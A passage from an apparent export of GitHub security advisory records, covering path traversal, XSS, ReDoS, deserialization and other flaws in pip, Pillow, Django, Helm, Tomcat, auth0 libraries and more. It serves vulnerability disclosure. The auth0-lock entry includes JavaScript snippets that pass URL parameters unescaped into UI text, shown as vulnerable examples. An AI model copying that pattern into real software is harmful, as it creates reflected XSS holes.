in a filename, as demonstrated by overwriting the /root/.ssh/authorized_keys file. This occurs in _download_http_url in _internal/download.py. A fix was committed 6704f2ace.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pip'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '19.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-20916'}, {'type': 'WEB', 'url': 'https://github.com/pypa/pip/issues/6413'}, {'type': 'WEB', 'url': 'https://github.com/gzpan123/pip/commit/a4c735b14a62f9cb864533808ac63936704f2ace'}, {'type': 'PACKAGE', 'url': 'https://github.com/pypa/pip/'}, {'type': 'WEB', 'url': 'https://github.com/pypa/pip/compare/19.1.1...19.2'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/09/msg00010.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00005.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00010.html'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T22:55:04Z', 'nvd_published_at': '2020-09-04T20:15:00Z'}" +1.4.0,GHSA-g6rj-rv7j-xwp4,2023-09-04T16:32:28Z,2021-06-08T18:49:11Z,,['CVE-2021-28675'],Pillow Denial of service,An issue was discovered in Pillow before 8.2.0. `PSDImagePlugin.PsdImageFile` lacked a sanity check on the number of input layers relative to the size of the data block. This could lead to a DoS on `Image.open` prior to `Image.load`.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28675'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/5377/commits/22e9bee4ef225c0edbb9323f94c26cee0c623497'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQHA5HAIBOYI3R6HDWCLAGFTIQP767FL/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.2.0.html#cve-2021-28675-fix-dos-in-psdimageplugin'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-233', 'CWE-252'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-03T21:41:46Z', 'nvd_published_at': '2021-06-02T15:15:00Z'}" +1.4.0,GHSA-jr3j-whm4-9wwm,2021-06-07T18:54:43Z,2021-06-04T19:10:34Z,,['CVE-2021-32641'],Reflected XSS when using flashMessages or languageDictionary,"### Overview + +Versions before and including `11.30.0` are vulnerable to reflected XSS. An attacker can execute arbitrary code when the library's +- `flashMessage` feature is utilized and user input or data from URL parameters is incorporated into the `flashMessage`. +- `languageDictionary` feature is utilized and user input or data from URL parameters is incorporated into the `languageDictionary`. + +### Am I affected? +You are affected by this vulnerability if you are using `auth0-lock` version `11.30.0` or lower and all of the following conditions apply: + +- You are utilizing `flashMessage` feature. +- User input or data from URL parameters is incorporated into the `flashMessage`. + +An example of a vulnerable snippet where query parameters are used to populate the `text` property of a `flashMessage`. +```js +var params = new URLSearchParams(location.search); +var errorMessage = params.get('error__message'); +var showParams = {}; + +if (!!errorMessage === true) { + showParams.flashMessage = { + type: 'error', + text: 'We were unable to log you in. ' + errorMessage, + }; +} + +lock.show(showParams); +``` + +OR + +- You are utilizing `languageDictionary` feature. +- User input or data from URL parameters is used in `languageDictionary` properties. + +An example of a vulnerable snippet where query parameters are used to populate the `socialLoginInstructions` property of a `languageDictionary`. +```js +var params = new URLSearchParams(location.search); +var instruction = params.get('instruction'); + +var options = { + languageDictionary: { + emailInputPlaceholder: ""something@youremail.com"", + title: ""title"", + socialLoginInstructions: instruction + }, +}; + +var lock = new Auth0LockPasswordless( + CLIENT_ID, + DOMAIN, + options +); + +lock.show() +``` + +### How to fix that? +Upgrade to version `11.30.1`. + +### Will this update impact my users? +The fix uses [DOMPurify](https://github.com/cure53/DOMPurify) to sanitise the `flashMessage` and `languageDictionary` inputs. If you are including inline JavaScript in these fields, like `script` tags or `onclick` attributes, these will be removed.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'auth0-lock'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '11.30.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/auth0/lock/security/advisories/GHSA-jr3j-whm4-9wwm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32641'}, {'type': 'WEB', 'url': 'https://github.com/auth0/lock/commit/d139cf01c8234b07caf265e051f39d3eab08f7ed'}, {'type': 'WEB', 'url': 'https://github.com/auth0/lock/releases/tag/v11.30.1'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-04T18:28:08Z', 'nvd_published_at': '2021-06-04T21:15:00Z'}" +1.4.0,GHSA-pw59-4qgf-jxr8,2022-04-04T21:27:42Z,2021-06-18T22:04:32Z,,['CVE-2020-17522'],Cache Manipulation Attack in Apache Traffic Control,"When ORT (now via atstccfg) generates ip_allow.config files in Apache Traffic Control 3.0.0 to 3.1.0 and 4.0.0 to 4.1.0, those files include permissions that allow bad actors to push arbitrary content into and remove arbitrary content from CDN cache servers. Additionally, these permissions are potentially extended to IP addresses outside the desired range, resulting in them being granted to clients possibly outside the CDN arcitechture.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/apache/trafficcontrol'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-17522'}, {'type': 'WEB', 'url': 'https://github.com/apache/trafficcontrol/commit/492290d810e9608afb5d265b98cd3f3e153e776b'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/trafficcontrol'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3c675031ac220b5eae64a9c84a03ee60045c6045738607dca4a96cb8@%3Ccommits.trafficcontrol.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3de212a3da73bcf98fa2db7eafb75b2eb8e131ff466e6efc4284df09%40%3Cdev.trafficcontrol.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc8bfd7d4f71d61e9193efcd4699eccbab3c202ec1d75ed9d502f08bf@%3Ccommits.trafficcontrol.apache.org%3E'}]","{'cwe_ids': ['CWE-525', 'CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2022-04-04T21:27:42Z', 'nvd_published_at': '2021-01-26T18:15:00Z'}" +1.4.0,GHSA-rxjp-mfm9-w4wr,2022-06-29T20:40:42Z,2021-06-04T21:15:56Z,,['CVE-2021-31542'],Path Traversal in Django,"In Django 2.2 before 2.2.21, 3.1 before 3.1.9, and 3.2 before 3.2.1, MultiPartParser, UploadedFile, and FieldFile allowed directory traversal via uploaded files with suitably crafted file names.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.21'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.1.9'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31542'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/04ac1624bdc2fa737188401757cf95ced122d26d'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/25d84d64122c15050a0ee739e859f22ddab5ac48'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/c98f446c188596d4ba6de71d1b77b4a6c5c2a007'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/3.2/releases/security/'}, {'type': 'PACKAGE', 'url': 'https://github.com/django/django'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!forum/django-announce'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/05/msg00005.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B4SQG2EAF4WCI2SLRL6XRDJ3RPK3ZRDV/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZVKYPHR3TKR2ESWXBPOJEKRO2OSJRZUE/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210618-0001/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2021/may/04/security-releases/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/04/3'}]","{'cwe_ids': ['CWE-22', 'CWE-434'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T20:28:55Z', 'nvd_published_at': '2021-05-05T15:15:00Z'}" +1.4.0,GHSA-hx7j-43w2-7rj7,2021-10-05T17:22:38Z,2021-06-07T22:12:13Z,,['CVE-2021-25946'],Prototype pollution in nconf-toml,Prototype pollution vulnerability in `nconf-toml` versions 0.0.1 through 0.0.2 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nconf-toml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.1'}, {'last_affected': '0.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25946'}, {'type': 'PACKAGE', 'url': 'https://github.com/RobLoach/nconf-toml'}, {'type': 'WEB', 'url': 'https://github.com/RobLoach/nconf-toml/blob/8ade08cd1cfb9691ab7cc5c3514cc05c5085918f/index.js#L8'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25946'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T21:58:39Z', 'nvd_published_at': '2021-05-25T19:15:00Z'}" +1.4.0,GHSA-7jr6-prv4-5wf5,2023-08-30T10:26:47Z,2021-06-23T18:14:31Z,,['CVE-2021-32690'],Helm passes repository credentials to alternate domain,"Helm is a tool for managing Charts (packages of pre-configured Kubernetes resources). In versions of helm prior to 3.6.1, a vulnerability exists where the username and password credentials associated with a Helm repository could be passed on to another domain referenced by that Helm repository. This issue has been resolved in 3.6.1. There is a workaround through which one may check for improperly passed credentials. One may use a username and password for a Helm repository and may audit the Helm repository in order to check for another domain being used that could have received the credentials. In the `index.yaml` file for that repository, one may look for another domain in the `urls` list for the chart versions. If there is another domain found and that chart version was pulled or installed, the credentials would be passed on.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm/v3'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/helm/helm/security/advisories/GHSA-56hp-xqp3-w2jf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32690'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/commit/61d8e8c4a6f95540c15c6a65f36a6dd0a45e7a2f'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-56hp-xqp3-w2jf'}, {'type': 'PACKAGE', 'url': 'https://github.com/helm/helm'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/releases/tag/v3.6.1'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0384'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-18T18:34:04Z', 'nvd_published_at': '2021-06-16T22:15:00Z'}" +1.4.0,GHSA-jqmc-fxxp-r589,2021-05-11T22:09:21Z,2021-06-18T18:31:05Z,,['CVE-2020-14942'],Deserialization of Untrusted Data in Tendenci,Tendenci 12.0.10 allows unrestricted deserialization in apps\helpdesk\views\staff.py.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tendenci'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.0.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 12.0.10'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-14942'}, {'type': 'WEB', 'url': 'https://github.com/tendenci/tendenci/issues/867'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-11T22:09:21Z', 'nvd_published_at': '2020-06-21T15:15:00Z'}" +1.4.0,GHSA-954c-jjx6-cxv7,2021-06-28T19:06:42Z,2021-06-28T16:46:41Z,,['CVE-2021-32702'],Reflected XSS from the callback handler's error query parameter,"### Overview + +Versions before and including `1.4.1` are vulnerable to reflected XSS. An attacker can execute arbitrary code by providing an XSS payload in the `error` query parameter which is then processed by the callback handler as an error message. + +### Am I affected? +You are affected by this vulnerability if you are using `@auth0/nextjs-auth0` version `1.4.1` or lower **unless** you are using custom error handling that does not return the error message in an HTML response. + +### How to fix that? +Upgrade to version `1.4.2`. + +### Will this update impact my users? +The fix adds basic HTML escaping to the error message and it should not impact your users. + +### Credit + +https://github.com/inian +https://github.com/git-ishanpatel","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@auth0/nextjs-auth0'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-954c-jjx6-cxv7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32702'}, {'type': 'WEB', 'url': 'https://github.com/auth0/nextjs-auth0/commit/6996e2528ceed98627caa28abafbc09e90163ccf'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@auth0/nextjs-auth0'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-25T15:38:26Z', 'nvd_published_at': '2021-06-25T17:15:00Z'}" +1.4.0,GHSA-j39c-c8hj-x4j3,2022-02-08T21:34:09Z,2021-06-16T17:45:29Z,,['CVE-2021-25122'],Exposure of Sensitive Information to an Unauthorized Actor in Apache Tomcat,"When responding to new h2c connection requests, Apache Tomcat versions 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41 and 8.5.0 to 8.5.61 could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.0.43'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.0'}, {'fixed': '8.5.63'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25122'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7%40%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcd90bf36b1877e1310b87ecd14ed7bbb15da52b297efd9f0e7253a3b@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd0463f9a5cbc02a485404c4b990f0da452e5ac5c237808edba11c947@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf6d5d57b114678d8898005faef31e9fd6d7c981fcc4ccfc3bc272fc9@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-34'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210409-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4891'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/03/01/1'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T19:53:13Z', 'nvd_published_at': '2021-03-01T12:15:00Z'}" +1.4.0,GHSA-9423-6c93-gpp8,2023-08-29T23:36:50Z,2021-06-23T17:13:29Z,,['CVE-2020-7667'],github.com/sassoftware/go-rpmutils Arbitrary File Write via Archive Extraction (Zip Slip),"The CPIO extraction functionality doesn't sanitize the paths of the archived files for leading and non-leading `..` which leads in file extraction outside of the current directory. Note, the fixing commit was applied to all affected versions which were re-released.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/sassoftware/go-rpmutils'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7667'}, {'type': 'WEB', 'url': 'https://github.com/sassoftware/go-rpmutils/commit/a64058cf21b8aada501bba923c9aab66fb6febf0'}, {'type': 'PACKAGE', 'url': 'https://github.com/sassoftware/go-rpmutils'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0042'}, {'type': 'WEB', 'url': 'https://snyk.io/research/zip-slip-vulnerability'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMSASSOFTWAREGORPMUTILSCPIO-570427'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T14:56:04Z', 'nvd_published_at': '2020-06-24T12:15:00Z'}" +1.4.0,GHSA-8h77-3xwr-hqhh,2022-12-14T15:11:01Z,2021-06-16T17:10:50Z,,['CVE-2021-21666'],Cross-site scripting in Jenkins Kiuwan Plugin,"Jenkins Kiuwan Plugin 1.6.0 and earlier does not escape query parameters in an error message for a form validation endpoint, resulting in a reflected cross-site scripting (XSS) vulnerability. + +Only older releases of Jenkins are affected by this vulnerability. Jenkins 2.275 and newer, LTS 2.263.2 and newer include a protection preventing this from being exploitable. + +Kiuwan Plugin 1.6.1 escapes affected parts of the error message in the form validation endpoint.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:kiuwanJenkinsPlugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21666'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/kiuwan-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2021-06-10/#SECURITY-2367'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/06/10/14'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-14T19:19:42Z', 'nvd_published_at': '2021-06-10T15:15:00Z'}" +1.4.0,GHSA-gj77-59wh-66hg,2022-02-08T21:21:38Z,2021-06-28T18:33:18Z,,['CVE-2021-32723'],Regular Expression Denial of Service (ReDoS) in Prism,"Some languages before 1.24.0 are vulnerable to Regular Expression Denial of Service (ReDoS). + +### Impact + +When Prism is used to highlight untrusted (user-given) text, an attacker can craft a string that will take a very very long time to highlight. Do not use the following languages to highlight untrusted text. + +- ASCIIDoc +- ERB + +Other languages are __not__ affected and can be used to highlight untrusted text. + +### Patches +This problem has been fixed in Prism v1.24. + +### References + +- PrismJS/prism#2774 +- PrismJS/prism#2688 +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'prismjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.24.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PrismJS/prism/security/advisories/GHSA-gj77-59wh-66hg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32723'}, {'type': 'WEB', 'url': 'https://github.com/PrismJS/prism/pull/2688'}, {'type': 'WEB', 'url': 'https://github.com/PrismJS/prism/pull/2774'}, {'type': 'WEB', 'url': 'https://github.com/PrismJS/prism/commit/d85e30da6755fdbe7f8559f8e75d122297167018'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrismJS/prism'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-28T18:15:20Z', 'nvd_published_at': '2021-06-28T20:15:00Z'}" +1.4.0,GHSA-77gc-v2xv-rvvh,2021-12-02T15:30:43Z,2021-06-08T18:49:02Z,,['CVE-2021-25287'],Out-of-bounds Read in Pillow,"An issue was discovered in Pillow before 8.2.0. There is an out-of-bounds read in J2kDecode, in j2ku_graya_la.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['PIL.Image.open']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '8.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25287'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/5377#issuecomment-833821470'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/5377/commits/3bf5eddb89afdf690eceaa52bc4d3546ba9a5f87'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/3bf5eddb89afdf690eceaa52bc4d3546ba9a5f87'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQHA5HAIBOYI3R6HDWCLAGFTIQP767FL/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.2.0.html#cve-2021-25287-cve-2021-25288-fix-oob-read-in-jpeg2kdecode'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-125'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-03T21:44:57Z', 'nvd_published_at': '2021-06-02T16:15:00Z'}"